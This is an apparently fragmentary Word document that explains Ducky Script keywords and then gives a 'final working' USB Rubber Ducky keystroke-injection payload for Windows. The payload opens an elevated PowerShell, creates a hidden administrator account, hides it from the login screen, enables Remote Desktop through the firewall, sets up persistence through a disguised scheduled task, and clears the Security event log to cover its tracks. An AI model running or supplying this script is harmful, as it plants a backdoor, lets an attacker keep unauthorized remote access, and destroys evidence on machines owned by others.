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USB Rubber Ducky Payload Script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jh1uowq93m6w" w:id="0"/>
            <w:bookmarkEnd w:id="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Ducky Script Key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REM</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> :  A comment. Used to describe what each section or line does. It does not affect script execution.</w:t>
              <w:br w:type="textWrapping"/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DELAY</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> :  Pauses execution for a specified number of milliseconds. </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">E.g., </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:color w:val="188038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DELAY 1000</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> pauses for 1 second.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: Types the text that follows, as if entered by a keyboard.</w:t>
              <w:br w:type="textWrapping"/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ENTER</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Press the Enter/Return key.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 Final Working Ducky Script - Launching PowerShell As Admin + Full Visual Demo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 Step 1: Open Run dialog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DELAY 2000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GUI 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DELAY 500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 Step 2: Open basic PowerShell (non-admin)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 powershell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DELAY 1500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REM Step 3: Elevate to Admin using RunAs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(manual UAC click required)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STRING Start-Process powershell -Verb RunAs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DELAY 3000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 NOTE: You must manually approve the UAC popup at this point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 Step 4: Create a new hidden admin account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STRING net user HiddenAdmin Password123 /add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DELAY 1000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STRING net localgroup Administrators HiddenAdmin /add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DELAY 1000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 Step 5: Hide the new account from login screen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STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HiddenAdmin /t REG_DWORD /d 0 /f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DELAY 1000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 Step 6: Enable Remote Desktop + open firewall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STRING reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f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DELAY 1000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STRING netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes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DELAY 1000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 Step 7: Add persistence via scheduled task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STRING schtasks /create /tn "SystemUpdate" /tr "powershell -Command Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0" /sc onlogon /rl highest /f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DELAY 1000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REM Step 8: Clear Windows Security logs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(cover tracks)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STRING wevtutil cl Security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DELAY 1000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 Final status message for demo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STRING echo Attack Complete - All Stages Executed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